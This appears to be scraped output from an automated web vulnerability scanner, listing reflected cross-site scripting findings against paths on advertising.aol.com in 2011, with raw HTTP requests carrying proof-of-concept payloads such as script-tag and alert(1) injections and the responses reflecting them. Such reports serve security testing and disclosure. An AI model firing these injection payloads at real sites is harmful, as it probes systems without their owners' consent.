HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:59 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:59 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13400 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/4c934"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/0/3/295357155/ |
GET /cc591"><script>alert(1)< Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:55 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:55 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13470 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/1/1/819977518/ |
GET /7bbcc"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:10 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:10 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13400 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/7bbcc"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/1/1/819977518/ |
GET /b471f"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:06 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:06 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13470 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/1/3/1696897902/ |
GET /35087"><script>alert(1)< Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:33 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:33 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/1/3/1696897902/ |
GET /caa83"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:36 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:36 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13404 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/caa83"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/2/2/1032347115/ |
GET /bd412"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:02 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:02 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/2/2/1032347115/ |
GET /28ac5"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:05 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:05 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13404 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/28ac5"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/2/3/1397978719/ |
GET /e5869"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:18 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:18 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13404 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/e5869"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/2/3/1397978719/ |
GET /f3f59"><script>alert(1)< Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:12 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:12 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/3/1/8239370/ |
GET /8c676"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:52 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:52 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13392 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/8c676"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/3/1/8239370/ |
GET /c8003"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:48 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:48 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13462 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/3/3/1557169105/ |
GET /4c13a"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:52 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:52 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13404 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/4c13a"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/3/3/1557169105/ |
GET /f6be9"><script>alert(1)< Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:49 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:49 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/4/1/1128450710/ |
GET /b3710"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:22 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:22 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/4/1/1128450710/ |
GET /12f6f"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:25 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:25 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13404 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/12f6f"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/4/3/708534695/ |
GET /7aa06"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:33 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:33 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13400 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/7aa06"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/4/3/708534695/ |
GET /69bea"><script>alert(1)< Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:29 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:29 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13470 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/5/2/1348442932/ |
GET /27601"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:16 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:16 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/5/2/1348442932/ |
GET /27551"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:19 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:19 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13404 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/27551"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/5/3/1649521156/ |
GET /96a23"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:25 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:25 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13404 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/96a23"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/5/3/1649521156/ |
GET /feaf1"><script>alert(1)< Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
